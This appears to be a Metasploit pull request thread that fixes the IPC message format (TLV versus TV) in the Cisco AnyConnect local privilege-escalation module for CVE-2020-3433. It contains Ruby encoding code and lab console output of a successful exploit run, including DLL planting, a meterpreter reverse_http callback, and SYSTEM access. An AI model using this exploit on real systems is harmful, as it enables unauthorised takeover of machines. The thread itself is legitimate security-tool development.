Fixed AnyConnect IPC message format:
- Made an error in the original research where the TLV had a type and an index, when it only has a type and a modifier that makes it into a TV (Type and Value, no Length).
- A TV has its value where the Length would be on a TLV.
- Also added a note on the endianness being correct/working, because endianness has no impact on the message being used to exploit the vulnerability.
This PR is a small quality correction and doesn't add/remove any functionality.
Thanks! Do you have an example of the console output for this module still working? If so I should be able to get this landed shortly after :+1:
I don't have a lab set up for this; but just to verify things I compared the to_binary_s result for the before/after definitions and this looks good to me:
require 'bindata'

class OldTlv < BinData::Record
  # TLVs are tricky when it comes to endianness. For the type and length fields, they're big endian, but
  # for the value, they're little endian. For example, each UTF-16 character is encoded in one little
  # endian unsigned short. There is one exception to that rule: UTF-8 strings and TV (Type and Value)
  # entries. Note that TVs are the ones that have a Type like 0x80XX, which are used to store some
  # booleans and unsigned shorts.
  # This is why having the entire "BinData::Record" as big endian is not a problem in this case: the IPC
  # message to which the vulnerabilit(ies) are associated only makes use of UTF-8 strings and a boolean.
  endian :big
  uint8 :msg_type, label: 'Type'
  uint8 :msg_index, label: 'Index'
  uint16 :msg_length, label: 'Length', initial_value: -> { msg_value.num_bytes }
  stringz :msg_value, label: 'Value', length: -> { msg_length }
end

class NewTlv < BinData::Record
  # TLVs are tricky when it comes to endianness. For the type and length fields, they're big endian, but
  # for the value, they're little endian. For example, each UTF-16 character is encoded in one little
  # endian unsigned short. There is one exception to that rule: UTF-8 strings and TV (Type and Value)
  # entries. Note that TVs are the ones that have a Type like 0x80XX, which are used to store some
  # booleans and unsigned shorts.
  # This is why having the entire "BinData::Record" as big endian is not a problem in this case: the IPC
  # message to which the vulnerabilit(ies) are associated only makes use of UTF-8 strings and a boolean.
  endian :big
  uint16 :msg_type, label: 'Type'
  uint16 :msg_length, label: 'Length', initial_value: -> { msg_value.num_bytes }
  stringz :msg_value, label: 'Value', length: -> { msg_length }
end

# Old layout: 8-bit type + 8-bit index; new layout: 16-bit type. Same bytes on the wire.
old = OldTlv.new(
  msg_type: 0,
  msg_index: 2,
  msg_value: 'hello world'
)
new = NewTlv.new(
  msg_type: 2,
  msg_value: 'hello world'
)

puts old.to_binary_s.bytes.inspect
puts new.to_binary_s.bytes.inspect
[0, 2, 0, 12, 104, 101, 108, 108, 111, 32, 119, 111, 114, 108, 100, 0]
[0, 2, 0, 12, 104, 101, 108, 108, 111, 32, 119, 111, 114, 108, 100, 0]
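To make the TLV-versus-TV distinction from the PR description concrete, here is an added example in plain Ruby (no bindata dependency); it is not code from the PR or from the Metasploit module. It assumes, from the comment in the record definition above, that the 0x80 modifier in the 16-bit big-endian Type field (types like 0x80XX) is what marks a TV, and that a TV's 16-bit value occupies the slot where a TLV's Length would be; the TLV value is a NUL-terminated UTF-8 string, matching the to_binary_s output above. The function names and the sample type numbers are this example's own.

```ruby
# Added example: pack and parse AnyConnect-style IPC entries as TLV or TV.
# Assumption (from the PR discussion): the 0x8000 bit in the 16-bit big-endian
# Type marks a TV entry, whose 16-bit value sits where a TLV's Length would be.
TV_MODIFIER = 0x8000

# Encode one entry. A TV carries a 16-bit value in the length slot; a TLV
# carries a 16-bit length followed by the UTF-8 string bytes plus a trailing
# NUL (hence length 12 for "hello world", as in the comparison above).
def encode_entry(type, value)
  if (type & TV_MODIFIER) != 0
    unless value.is_a?(Integer) && (0..0xFFFF).cover?(value)
      raise ArgumentError, 'TV value must be an unsigned 16-bit integer'
    end
    [type, value].pack('nn')
  else
    bytes = value.to_s.encode('UTF-8').b + "\x00".b
    raise ArgumentError, 'TLV value too long for a 16-bit length' if bytes.bytesize > 0xFFFF
    [type, bytes.bytesize].pack('nn') + bytes
  end
end

# Decode a buffer of consecutive entries into [type, value] pairs.
# A parser that treats every entry as a TLV would misread a TV's value as a
# length and walk off the end of the buffer, so the header is inspected first
# and every read is bounds-checked.
def decode_entries(buf)
  buf = buf.b
  entries = []
  offset = 0
  while offset < buf.bytesize
    raise 'truncated entry header' if buf.bytesize - offset < 4
    type, second = buf.byteslice(offset, 4).unpack('nn')
    offset += 4
    if (type & TV_MODIFIER) != 0
      # TV: the second field is the value itself, nothing follows it.
      entries << [type, second]
    else
      # TLV: the second field is the length of the value bytes that follow.
      raise 'truncated TLV value' if buf.bytesize - offset < second
      raw = buf.byteslice(offset, second)
      offset += second
      entries << [type, raw.chomp("\x00".b).force_encoding('UTF-8')]
    end
  end
  entries
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample message: one string TLV (type 2) and one boolean TV (type 0x8001).
  msg = encode_entry(0x0002, 'hello world') + encode_entry(0x8001, 1)
  p msg.bytes
  p decode_entries(msg)
end
```

The TLV branch reproduces the byte sequence printed above for type 2 and "hello world"; the TV branch shows why the old Type/Index reading was wrong: with a 16-bit type, the modifier byte and the value-in-length-slot fall out naturally, and a parser that forgot the TV case would misinterpret the value as a length.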
Release notes
Improves the CIPCTlv definition for the exploits/windows/local/anyconnect_lpe module
Thanks!
Sorry for the late answer, thanks for merging this @adfoster-r7. For future reference, the console output follows.
msf6 exploit(windows/local/anyconnect_lpe) > show options
Module options (exploit/windows/local/anyconnect_lpe):
Name Current Setting Required Description
---- --------------- -------- -----------
CVE CVE-2020-3433 yes Vulnerability to use (Accepted: CVE-2020-3433, CVE-2020-3153)
INSTALL_PATH no Cisco AnyConnect Secure Mobility Client installation path (where 'vpndownloader.exe' should be found). It will be automatically detected if not set.
SESSION 1 yes The session to run this module on
Payload options (windows/meterpreter/reverse_http):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.98.129 yes The local listener hostname
LPORT 8444 yes The local listener port
LURI /m/32 no The HTTP Path
Exploit target:
Id Name
-- ----
0 Windows x86/x64 with x86 payload
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/anyconnect_lpe) > show sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows DESKTOP-MADG1SD\tester001 @ DESKTOP-MADG1SD 192.168.98.129:8080 -> 192.168.98.128:49679 (192.168.98.128)
msf6 exploit(windows/local/anyconnect_lpe) > run
[*] Started HTTP reverse handler on http://192.168.98.129:8444/m/32
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Cisco AnyConnect version 4.8.3052.0.0 < 4.9.00086 (CVE-2020-3433).
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.8.3052.0.0 < 4.9.00086 (CVE-2020-3433).
[*] Writing the payload to C:\Users\TESTER~1\AppData\Local\Temp\lw5SO3\dbghelp.dll
[!] http://192.168.98.129:8444/m/32 handling request from 192.168.98.128; (UUID: t7kd6pwm) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.98.129:8444/m/32 handling request from 192.168.98.128; (UUID: t7kd6pwm) Staging x86 payload (176732 bytes) ...
[!] http://192.168.98.129:8444/m/32 handling request from 192.168.98.128; (UUID: t7kd6pwm) Without a database connected that payload UUID tracking will not work!
[+] Deleted C:\Users\TESTER~1\AppData\Local\Temp\lw5SO3\dbghelp.dll
[+] Deleted C:\Users\TESTER~1\AppData\Local\Temp\lw5SO3
[*] Meterpreter session 2 opened (192.168.98.129:8444 -> 192.168.98.128:49686) at 2023-02-01 16:56:54 +0000
meterpreter > sysinfo
Computer : DESKTOP-MADG1SD
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >